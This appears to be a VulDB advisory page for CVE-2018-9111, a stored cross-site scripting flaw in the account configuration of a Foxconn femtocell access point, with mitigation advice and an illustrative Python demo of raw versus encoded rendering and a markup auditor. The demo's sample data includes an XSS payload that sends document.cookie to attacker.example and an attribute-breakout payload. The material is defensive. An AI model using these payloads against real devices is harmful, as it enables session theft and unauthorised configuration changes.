CVE-2018-9111 in FEMTO AP-FC4064-T
Summary
by MITRE
Cross Site Scripting (XSS) exists on the Foxconn FEMTO AP-FC4064-T AP_GT_B38_5.8.3lb15-W47 LTE Build 15 via the configuration of a user account. An attacker can execute arbitrary script on an unsuspecting user's browser.
Analysis
by VulDB Data Team • 02/04/2020
CVE-2018-9111 is a cross site scripting flaw in the Foxconn FEMTO AP-FC4064-T access point running firmware AP_GT_B38_5.8.3lb15-W47 LTE Build 15. The weakness sits in the device's user account configuration functionality: a value supplied when an account is created or edited is written back into the management web interface without sufficient input validation or output encoding. Because the value becomes part of the saved account configuration, the flaw behaves as a stored XSS rather than a one-off reflection: the payload is kept with the account and runs whenever a user views the page that renders it. The advisory does not name the affected field; the account name and description are the usual candidates. The issue is classified as CWE-79, Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'), the weakness class in which user-supplied data is emitted into a page without being neutralized for its HTML context and is therefore interpreted as markup or script by other users' browsers.
The operational impact goes beyond a single script execution, since the flaw gives an attacker a foothold inside the device's management context. When an administrator or other user opens the page that renders the malicious account entry, the script runs in that user's authenticated session on the management interface and can read whatever the page can read, rewrite the displayed content, redirect the browser to an attacker-controlled site, or issue configuration requests on behalf of the victim (a session cookie is only directly readable if it is not marked HttpOnly, but requests made by the injected script carry the session regardless). This is particularly concerning in enterprise environments where administrators manage accounts through the web interface, because the payload lives in the stored configuration and stays active until the offending entry is removed or fixed firmware is installed, not merely until the attacker's own session ends. In ATT&CK terms the execution maps to T1059.007, Command and Scripting Interpreter: JavaScript.
Exploitation needs little beyond the ability to configure a user account, which in practice means an authenticated user of the management interface who may create or edit accounts. The value of the flaw to an attacker is therefore lateral: a lower-privileged or compromised account can be used to attack administrators who later view the account list. The payload is a script tag, or an attribute breakout followed by an event handler, placed in an account parameter; the device stores it and emits it unencoded when the interface renders the account. The problem persists because the configuration flow neither validates the input when it is accepted nor encodes it when it is displayed, so every field that can hold free text (account names, descriptions and similar) is a candidate. Organizations should treat the finding as part of a broader assessment of their network infrastructure and of how IoT and network devices are managed. The proper fix is vendor firmware from Foxconn that applies context-appropriate output encoding and, as defence in depth, an allow-list on the configurable fields. Until such firmware is deployed, restrict reachability of the management interface through network segmentation, limit which users may configure accounts, and, where a web application firewall or reverse proxy fronts the interface, use it to detect and block common XSS payloads, bearing in mind that payload filtering is a stopgap and not a fix. Regular audits of network device configurations should look for the same pattern in other infrastructure components that expose similar attack vectors.
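As an added illustration (not code from this page, from VulDB or from Foxconn), the following Python models the two halves of the problem described in the paragraphs above: an account-list page that interpolates stored account fields raw, the same page with HTML encoding applied, an allow-list check for the account name at configuration time, and a small structural audit a tester can run on rendered output to confirm whether stored account data has produced tags or attributes the page should not contain. The account entries, the two payloads, the table layout and the allowed tag set are constructed for this example; the real firmware's templates and field names are not known from the advisory.

```python
import html
import re
from html.parser import HTMLParser

# Constructed sample data: what an administrator would see in the account list.
# The second and third names are attacker-supplied payloads of the kind the
# advisory describes, stored through the account configuration form.
SAMPLE_ACCOUNTS = [
    {"name": "alice", "description": "Site operator"},
    {"name": "<script>document.location='http://attacker.example/?c='+document.cookie</script>",
     "description": "script-tag payload (text context)"},
    {"name": 'bob" onmouseover="alert(document.domain)',
     "description": "attribute-breakout payload (attribute context)"},
]

# Allow-list for account names, applied when the configuration is accepted.
# This is defence in depth; output encoding below is the actual fix.
USERNAME_RE = re.compile(r"[A-Za-z0-9._-]{1,32}")


def validate_username(name: str) -> bool:
    """Return True only if the name consists solely of allow-listed characters."""
    return USERNAME_RE.fullmatch(name) is not None


def render_accounts_vulnerable(accounts) -> str:
    """Render the list the way a vulnerable firmware might: raw interpolation
    into both an attribute context (title="...") and a text context."""
    rows = []
    for acc in accounts:
        rows.append('<tr><td title="%s">%s</td><td>%s</td></tr>'
                    % (acc["name"], acc["name"], acc["description"]))
    return "<table>\n" + "\n".join(rows) + "\n</table>"


def render_accounts_hardened(accounts) -> str:
    """Same page with HTML encoding applied to every stored field.
    quote=True also encodes the quote characters, which is what closes the
    attribute-breakout vector; the text-context vector is closed by < and >."""
    rows = []
    for acc in accounts:
        name = html.escape(acc["name"], quote=True)
        desc = html.escape(acc["description"], quote=True)
        rows.append('<tr><td title="%s">%s</td><td>%s</td></tr>' % (name, name, desc))
    return "<table>\n" + "\n".join(rows) + "\n</table>"


# Structural audit: the account table is expected to contain only these tags
# and attributes. Anything else in the parsed output came from stored data.
ALLOWED_TAGS = {"table", "tr", "td"}
ALLOWED_ATTRS = {"title"}


class MarkupAuditor(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:
            self.findings.append("unexpected tag <%s>" % tag)
        for attr, _ in attrs:
            if attr not in ALLOWED_ATTRS:
                self.findings.append("unexpected attribute %s on <%s>" % (attr, tag))


def audit_rendered_page(rendered: str) -> list:
    """Parse rendered HTML and report tags/attributes outside the expected set.
    Parsing (rather than grepping for '<script') matters: an encoded payload
    still contains the word 'onmouseover' but no longer forms an attribute."""
    auditor = MarkupAuditor()
    auditor.feed(rendered)
    auditor.close()
    return auditor.findings


if __name__ == "__main__":
    for acc in SAMPLE_ACCOUNTS:
        print("validate_username(%r) -> %s" % (acc["name"][:20], validate_username(acc["name"])))
    print("vulnerable page findings:", audit_rendered_page(render_accounts_vulnerable(SAMPLE_ACCOUNTS)))
    print("hardened page findings:  ", audit_rendered_page(render_accounts_hardened(SAMPLE_ACCOUNTS)))
```

The audit deliberately works on the parsed tree rather than on substrings: the hardened output still contains the text `onmouseover=` inside an encoded attribute value, so a naive grep would report a false positive, whereas the parser correctly sees only `title` attributes and `td` elements. The same structural check can be pointed at the real device's account page by a tester who has planted a labelled test name, without needing to know the firmware's template.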